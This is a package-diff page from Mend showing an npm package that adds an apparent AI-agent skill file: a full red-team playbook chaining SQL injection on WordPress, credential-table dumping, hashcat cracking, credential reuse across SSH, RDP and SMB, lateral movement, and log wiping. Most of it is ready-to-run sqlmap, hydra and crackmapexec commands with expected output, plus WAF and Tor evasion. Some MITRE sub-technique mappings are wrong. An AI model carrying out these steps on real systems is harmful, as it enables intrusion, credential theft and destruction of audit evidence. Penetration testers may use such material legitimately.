npm - rtexit-method - Versions diffs - 0.1.0 → 0.1.1 - Mend

rtexit-method 0.1.0 → 0.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (220) hide show

package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md ADDED Viewed

@@ -0,0 +1,612 @@
+---
+name: rt-scenario-w002
+description: "W-002: SQLi → Database Dump → Password Crack → Lateral Movement. Domain: web. Attack chain: parameter discovery → sqlmap exploitation → user table dump → hashcat → credential reuse → lateral movement. MITRE: T1190 → T1555 → T1078. Real example: WordPress login endpoint → dump users table → crack MD5/bcrypt → reuse on other services"
+---
+# W-002: SQLi → Database Dump → Password Crack → Lateral Movement
+## Overview
+**Attack Objective:** Exploit a SQL injection vulnerability to extract user credentials from a backend database, crack password hashes offline, and reuse cracked credentials to move laterally to other services within the target environment.
+**Required Access Level:** None (unauthenticated — attack begins from the public internet or internal network depending on scope)
+**Estimated Time to Execute:**
+- Parameter discovery: 15–30 minutes
+- SQLi exploitation and dump: 30–90 minutes
+- Password cracking: 30 minutes to several hours (hash type and wordlist dependent)
+- Credential reuse and lateral movement: 30–60 minutes
+**Detection Risk Level:** Medium-High
+- SQLmap generates high request volume — easily detected by WAF/IDS
+- Offline cracking generates no network noise
+- Credential reuse over common ports (SSH, RDP, SMB) may trigger authentication alerts
+---
+## Prerequisites
+### Required Tools
+```bash
+# sqlmap — automated SQL injection tool
+pip install sqlmap
+# or
+sudo apt install sqlmap
+# hashcat — GPU-accelerated password cracker
+sudo apt install hashcat
+# Windows: download from https://hashcat.net/hashcat/
+# ffuf — parameter and endpoint fuzzing
+go install github.com/ffuf/ffuf/v2@latest
+# or
+sudo apt install ffuf
+# wfuzz — alternative parameter fuzzer
+pip install wfuzz
+# hydra — credential stuffing / brute-force for lateral movement
+sudo apt install hydra
+# crackmapexec (CME) / netexec — lateral movement over SMB/SSH/RDP
+pip install crackmapexec
+# or use netexec (maintained fork)
+pip install netexec
+# curl — manual request crafting
+# (pre-installed on most systems)
+# Wordlists
+# rockyou.txt — commonly available at /usr/share/wordlists/rockyou.txt on Kali
+# SecLists — https://github.com/danielmiessler/SecLists
+sudo apt install seclists
+```
+### Required Access or Conditions
+- Target URL in scope (confirmed in Rules of Engagement)
+- Web application with at least one parameter passed to a backend database (GET/POST)
+- Outbound connectivity from attacker machine to target (for active exploitation)
+- Wordlist for cracking (rockyou.txt or custom)
+- GPU available for faster cracking (optional but strongly recommended for bcrypt)
+### Skill Level
+**INTERMEDIATE** — Requires understanding of SQL injection concepts, HTTP request structure, hash types, and basic network lateral movement techniques.
+---
+## Attack Chain
+```
+[1] Parameter Discovery
+        |
+        v
+[2] SQLi Detection (manual + automated)
+        |
+        v
+[3] sqlmap Exploitation (confirm injectable parameter)
+        |
+        v
+[4] Database Enumeration (list databases, tables)
+        |
+        v
+[5] User Table Dump (extract usernames + password hashes)
+        |
+        v
+[6] Hash Identification
+        |
+        v
+[7] Offline Password Cracking (hashcat)
+        |
+        v
+[8] Credential Reuse (SSH, RDP, SMB, admin panels, email)
+        |
+        v
+[9] Lateral Movement (pivot to internal systems)
+```
+**MITRE ATT&CK Chain:** T1190 (Exploit Public-Facing Application) → T1555 (Credentials from Password Stores) → T1078 (Valid Accounts)
+---
+## Step-by-Step Execution
+### Step 1 — Parameter Discovery
+Identify injectable parameters across the target application.
+```bash
+# Fuzz GET parameters on a known endpoint
+ffuf -u "https://target.com/page?FUZZ=1" \
+  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
+  -mc 200,301,302 \
+  -o params_get.json
+# Fuzz POST body parameters
+ffuf -u "https://target.com/login" \
+  -X POST \
+  -d "FUZZ=test" \
+  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  -mc 200,301,302
+# Also check for WordPress-specific endpoints
+curl -s "https://target.com/wp-login.php" | grep -i "name="
+```
+**Expected Output:** A list of parameters that return different response codes or content lengths. Focus on parameters that interact with search, login, or ID-based lookups.
+**Fallback:** If ffuf returns no interesting results, manually browse the application and capture requests with Burp Suite. Export requests to a file for sqlmap.
+---
+### Step 2 — Manual SQLi Probe
+Before automating, verify injectable behavior manually to reduce noise.
+```bash
+# Test a GET parameter for error-based SQLi
+curl -s "https://target.com/page?id=1'"
+curl -s "https://target.com/page?id=1 AND 1=1--"
+curl -s "https://target.com/page?id=1 AND 1=2--"
+# WordPress login — test username field
+curl -s -X POST "https://target.com/wp-login.php" \
+  -d "log=admin'&pwd=test&wp-submit=Log+In"
+# Look for: SQL error messages, response size differences, time delays
+```
+**Expected Output:**
+- Error-based: `You have an error in your SQL syntax`
+- Boolean-based: Different page content for `1=1` vs `1=2`
+- Blind: No visible change but detectable via response time
+**Fallback:** If no error is visible, try time-based blind: `1 AND SLEEP(5)--` — if response delays 5 seconds, the parameter is injectable.
+---
+### Step 3 — sqlmap Exploitation
+Confirm injection and identify the DBMS.
+```bash
+# Basic GET parameter test
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  --level=3 \
+  --risk=2 \
+  --dbs
+# POST parameter (e.g., WordPress login username field)
+sqlmap -u "https://target.com/wp-login.php" \
+  --data="log=admin&pwd=test&wp-submit=Log+In" \
+  -p "log" \
+  --batch \
+  --level=3 \
+  --risk=2 \
+  --dbs
+# With a saved Burp Suite request file
+sqlmap -r request.txt \
+  --batch \
+  --level=3 \
+  --risk=2 \
+  --dbs
+# Add cookies if authenticated session is needed
+sqlmap -u "https://target.com/page?id=1" \
+  --cookie="PHPSESSID=abcdef1234567890" \
+  --batch \
+  --dbs
+```
+**Expected Output:**
+```
+[INFO] the back-end DBMS is MySQL
+available databases [3]:
+[*] information_schema
+[*] wordpress
+[*] mysql
+```
+**Fallback:** If WAF blocks sqlmap, add tamper scripts:
+```bash
+sqlmap -u "https://target.com/page?id=1" \
+  --tamper=space2comment,between,randomcase \
+  --delay=2 \
+  --batch \
+  --dbs
+```
+---
+### Step 4 — Database and Table Enumeration
+```bash
+# List tables in the target database
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  -D wordpress \
+  --tables
+# For WordPress specifically
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  -D wordpress \
+  -T wp_users \
+  --columns
+```
+**Expected Output:**
+```
+Database: wordpress
+[12 tables]
++--------------------+
+| wp_commentmeta     |
+| wp_comments        |
+| wp_options         |
+| wp_posts           |
+| wp_users           |
+| wp_usermeta        |
++--------------------+
+Table: wp_users
+[10 columns]
++---------------------+
+| ID                  |
+| user_login          |
+| user_pass           |
+| user_email          |
+| user_registered     |
++---------------------+
+```
+**Fallback:** If table listing fails, try:
+```bash
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  -D wordpress \
+  --common-tables
+```
+---
+### Step 5 — User Table Dump
+```bash
+# Dump user credentials from wp_users
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  -D wordpress \
+  -T wp_users \
+  -C "user_login,user_pass,user_email" \
+  --dump
+# Output is saved automatically to:
+# ~/.local/share/sqlmap/output/<target>/dump/wordpress/wp_users.csv
+```
+**Expected Output:**
+```
++------------+------------------------------------+-------------------------+
+| user_login | user_pass                          | user_email              |
++------------+------------------------------------+-------------------------+
+| admin      | $P$BhBYcs4M9Rp5VVb9rMHJAkDq7dJo0m1 | admin@target.com        |
+| editor     | $P$BZaK0UrwT4TQhspvhmY87V.l5HZUI/0  | editor@target.com       |
++------------+------------------------------------+-------------------------+
+```
+**Fallback:** If the dump is slow or interrupted, use `--start` and `--stop` to paginate:
+```bash
+sqlmap -u "https://target.com/page?id=1" \
+  --batch \
+  -D wordpress \
+  -T wp_users \
+  -C "user_login,user_pass" \
+  --dump \
+  --start=1 --stop=50
+```
+---
+### Step 6 — Hash Identification
+```bash
+# Use hashid or hashcat's example hashes to identify hash type
+hashid '$P$BhBYcs4M9Rp5VVb9rMHJAkDq7dJo0m1'
+# Expected: [+] Wordpress >= v2.6.2
+# Common hash types:
+# MD5 raw:    $1$ or 32-char hex — hashcat mode 0
+# WordPress:  $P$            — hashcat mode 400
+# bcrypt:     $2y$ or $2a$   — hashcat mode 3200
+# SHA-1:      40-char hex    — hashcat mode 100
+# Extract hashes to a file
+awk -F',' '{print $2}' wp_users.csv | tail -n +2 > hashes.txt
+```
+---
+### Step 7 — Offline Password Cracking with Hashcat
+```bash
+# WordPress phpass hashes (mode 400)
+hashcat -m 400 hashes.txt /usr/share/wordlists/rockyou.txt
+# With rules for better coverage
+hashcat -m 400 hashes.txt /usr/share/wordlists/rockyou.txt \
+  -r /usr/share/hashcat/rules/best64.rule
+# MD5 hashes (mode 0)
+hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
+# bcrypt (mode 3200) — slow, GPU highly recommended
+hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt \
+  --force
+# Check cracked passwords
+hashcat -m 400 hashes.txt --show
+# Output format: hash:password
+# $P$BhBYcs4M9Rp5VVb9rMHJAkDq7dJo0m1:Password123
+```
+**Expected Output:**
+```
+$P$BhBYcs4M9Rp5VVb9rMHJAkDq7dJo0m1:Password123
+$P$BZaK0UrwT4TQhspvhmY87V.l5HZUI/0:welcome2023
+```
+**Fallback:** If rockyou fails, try:
+- CrackStation or online hash lookup for MD5/SHA-1 (for authorized engagements)
+- Targeted wordlists based on OSINT (company name, domain, found usernames)
+- Combination attack: `hashcat -m 400 hashes.txt -a 1 wordlist1.txt wordlist2.txt`
+---
+### Step 8 — Credential Reuse Testing
+Collect all cracked username:password pairs and test against other services.
+```bash
+# Build credential list
+cat > creds.txt << 'EOF'
+admin:Password123
+editor:welcome2023
+EOF
+# Test SSH
+hydra -C creds.txt ssh://target.com
+hydra -C creds.txt ssh://192.168.1.0/24
+# Test RDP
+hydra -C creds.txt rdp://target.com
+# Test SMB with crackmapexec / netexec
+crackmapexec smb 192.168.1.0/24 -u admin -p Password123
+netexec smb 192.168.1.0/24 -u creds.txt -p creds.txt --no-bruteforce
+# Test FTP
+hydra -C creds.txt ftp://target.com
+# Test other web admin panels
+hydra -C creds.txt -s 8080 target.com http-post-form \
+  "/admin/login:username=^USER^&password=^PASS^:Invalid credentials"
+# WordPress admin panel reuse
+curl -s -X POST "https://target.com/wp-login.php" \
+  -d "log=admin&pwd=Password123&wp-submit=Log+In" \
+  -c cookies.txt -b cookies.txt -L | grep -i "dashboard\|logout"
+```
+**Expected Output:**
+```
+SSH: [22][ssh] host: 192.168.1.10  login: admin  password: Password123
+SMB: 192.168.1.15  445  WINSERVER  [+] DOMAIN\admin:Password123 (Pwn3d!)
+```
+**Fallback:** If direct reuse fails, try variations:
+```bash
+# Common password mutations
+# Password123 → password123, Password123!, Password1234
+# Use hashcat rules to generate mutations first:
+hashcat --stdout creds_passwords.txt -r /usr/share/hashcat/rules/best64.rule > mutated_passwords.txt
+```
+---
+### Step 9 — Lateral Movement
+Once valid credentials are confirmed on internal systems:
+```bash
+# SSH lateral movement
+ssh admin@192.168.1.10
+# SMB — list shares and access files
+crackmapexec smb 192.168.1.15 -u admin -p Password123 --shares
+smbclient //192.168.1.15/C$ -U admin%Password123
+# RDP session
+xfreerdp /u:admin /p:Password123 /v:192.168.1.20
+# Pass-the-hash if NTLM hash obtained (no cleartext needed)
+crackmapexec smb 192.168.1.0/24 \
+  -u admin \
+  -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+# Execute commands remotely via SMB
+crackmapexec smb 192.168.1.15 -u admin -p Password123 -x "whoami /all"
+# WinRM if enabled (port 5985)
+crackmapexec winrm 192.168.1.15 -u admin -p Password123 -x "ipconfig"
+# Enumerate further from compromised host
+crackmapexec smb 192.168.1.0/24 -u admin -p Password123 --loggedon-users
+```
+**Expected Output:**
+```
+SMB  192.168.1.15  445  WINSERVER  [+] DOMAIN\admin:Password123 (Pwn3d!)
+SMB  192.168.1.15  445  WINSERVER  [+] Executed command
+SMB  192.168.1.15  445  WINSERVER  nt authority\system
+```
+---
+## Real-World Reference
+**Scenario: WordPress Site Compromise → Internal Network Access**
+1. Target is a company running WordPress at `https://company.com/wp-login.php`
+2. The `log` parameter in the login form is injectable via boolean-based blind SQLi
+3. sqlmap extracts the `wp_users` table containing `admin:$P$BhBYcs4M9Rp5VVb9rMHJAkDq7dJo0m1`
+4. hashcat cracks the phpass hash to `Summer2023!` in 4 hours using rockyou + best64 rules
+5. The admin reused `Summer2023!` on the company VPN, SSH server, and internal GitLab
+6. Attacker authenticates to GitLab, finds hardcoded database credentials in source code
+7. Full internal network access achieved from a single SQLi vulnerability
+**Real CVE References:**
+- CVE-2022-21661 — WordPress core SQLi via WP_Query
+- CVE-2023-28121 — WooCommerce authentication bypass
+- CVE-2020-11738 — WordPress plugin SQLi (Snap Creek Duplicator)
+---
+## MITRE ATT&CK Mapping
+| Step | Tactic | Technique | Sub-technique | Description |
+|------|--------|-----------|---------------|-------------|
+| 1 — Parameter Discovery | Reconnaissance | T1595 | T1595.002 — Active Scanning | Fuzzing web parameters to identify attack surface |
+| 2 — Manual SQLi Probe | Initial Access | T1190 | — | Exploit Public-Facing Application | Testing injectable parameters manually |
+| 3 — sqlmap Exploitation | Initial Access | T1190 | — | Exploit Public-Facing Application | Automated SQLi to gain DB access |
+| 4 — DB Enumeration | Collection | T1213 | T1213.002 — Sharepoint | Enumerating database structure |
+| 5 — User Table Dump | Credential Access | T1555 | T1555.003 — Credentials from Web Browsers | Dumping credential tables from DB |
+| 6 — Hash Identification | Credential Access | T1552 | T1552.001 — Credentials in Files | Identifying hash format for cracking |
+| 7 — Password Cracking | Credential Access | T1110 | T1110.002 — Password Cracking | Offline hashcat attack against dumped hashes |
+| 8 — Credential Reuse | Initial Access / Lateral Movement | T1078 | T1078.003 — Local Accounts | Using cracked credentials on other services |
+| 9 — Lateral Movement | Lateral Movement | T1021 | T1021.002 — SMB/Windows Admin Shares | Pivoting to internal systems with valid credentials |
+---
+## Detection & OPSEC
+### How This Attack Is Detected
+- **SQLmap traffic:** High request volume with anomalous SQL syntax in parameters — detected by WAFs (ModSecurity, AWS WAF, Cloudflare), IDS/IPS (Snort, Suricata), and SIEM correlation rules
+- **Error-based SQLi:** Application logs capture SQL error messages triggered by injection attempts
+- **Database query logging:** MySQL `general_log` or `slow_query_log` captures malicious queries
+- **Bulk dump operations:** Large number of queries against `information_schema` — unusual DB load patterns
+- **Credential spray/stuffing:** Multiple failed authentication attempts across SSH, SMB, RDP — detected by fail2ban, Windows Event ID 4625, and SIEM rules
+- **Lateral movement:** Abnormal login times, new source IPs, pass-the-hash (Event ID 4624 Logon Type 3), psexec artifacts
+### How to Reduce Detection Risk (Authorized Engagements)
+```bash
+# Slow down sqlmap to avoid rate limiting and WAF triggers
+sqlmap -u "https://target.com/page?id=1" \
+  --delay=3 \
+  --randomize-headers \
+  --random-agent \
+  --batch
+# Use tamper scripts to obfuscate SQL syntax
+sqlmap -u "https://target.com/page?id=1" \
+  --tamper=space2comment,charencode,randomcase \
+  --batch
+# Route through Tor or proxy chain for IP obfuscation
+sqlmap -u "https://target.com/page?id=1" \
+  --tor \
+  --tor-type=SOCKS5 \
+  --check-tor \
+  --batch
+# Limit dump to only necessary columns — avoid full table scans
+sqlmap ... -C "user_login,user_pass" --dump
+# Use low-and-slow credential reuse — avoid lockout
+crackmapexec smb 192.168.1.0/24 -u admin -p Password123 \
+  --continue-on-success \
+  --jitter 5
+```
+### Artifacts Left Behind
+| Artifact | Location | Notes |
+|----------|----------|-------|
+| Web server access logs | `/var/log/apache2/access.log`, `/var/log/nginx/access.log` | Contains all sqlmap requests |
+| Database general log | MySQL: `/var/lib/mysql/<hostname>.log` | Captures all SQL queries |
+| Application error logs | Varies by framework | SQL error messages |
+| Auth logs | `/var/log/auth.log`, `/var/log/secure` | SSH login attempts |
+| Windows Event Logs | `Security.evtx` (Event 4624, 4625, 4648) | SMB/RDP authentication events |
+| SMB connection logs | Windows `System.evtx` | Lateral movement over SMB |
+| sqlmap output directory | `~/.local/share/sqlmap/output/` | Local dump files on attacker machine |
+| hashcat potfile | `~/.local/share/hashcat/hashcat.potfile` | Cracked passwords stored locally |
+---
+## Cleanup
+Steps to remove artifacts after an authorized engagement:
+```bash
+# 1. Remove sqlmap output directory
+rm -rf ~/.local/share/sqlmap/output/
+# 2. Clear hashcat potfile
+rm ~/.local/share/hashcat/hashcat.potfile
+# or
+> ~/.local/share/hashcat/hashcat.potfile
+# 3. Remove downloaded files, credential lists, and hash files
+rm -f hashes.txt creds.txt wp_users.csv mutated_passwords.txt params_get.json
+# 4. Clear shell history
+history -c && history -w
+# or for zsh:
+rm ~/.zsh_history && history -p
+# 5. On compromised Linux targets (if shell access obtained):
+# Clear auth logs (coordinate with client — do NOT do this on production without approval)
+# > /var/log/auth.log
+# 6. On Windows targets:
+# Remove created user accounts if any were added
+# Clear specific Event Log entries (coordinate with client)
+wevtutil cl Security
+wevtutil cl System
+# 7. Remove any uploaded webshells or payloads from the target web server
+# (document exact paths during engagement for cleanup reference)
+# 8. Remove SSH known_hosts entries for target IPs
+ssh-keygen -R target.com
+ssh-keygen -R 192.168.1.10
+```
+---
+## References
+| Resource | URL |
+|----------|-----|
+| sqlmap documentation | https://sqlmap.org |
+| sqlmap tamper scripts | https://github.com/sqlmapproject/sqlmap/tree/master/tamper |
+| hashcat wiki | https://hashcat.net/wiki/ |
+| hashcat example hashes | https://hashcat.net/wiki/doku.php?id=example_hashes |
+| SecLists wordlists | https://github.com/danielmiessler/SecLists |
+| CrackMapExec wiki | https://wiki.porchetta.industries/ |
+| netexec (CME fork) | https://github.com/Pennyw0rth/NetExec |
+| MITRE T1190 | https://attack.mitre.org/techniques/T1190/ |
+| MITRE T1555 | https://attack.mitre.org/techniques/T1555/ |
+| MITRE T1078 | https://attack.mitre.org/techniques/T1078/ |
+| MITRE T1021 | https://attack.mitre.org/techniques/T1021/ |
+| MITRE T1110 | https://attack.mitre.org/techniques/T1110/ |
+| WordPress SQLi CVE-2022-21661 | https://nvd.nist.gov/vuln/detail/CVE-2022-21661 |
+| PortSwigger SQLi | https://portswigger.net/web-security/sql-injection |
+| OWASP SQLi Testing Guide | https://owasp.org/www-project-web-security-testing-guide/ |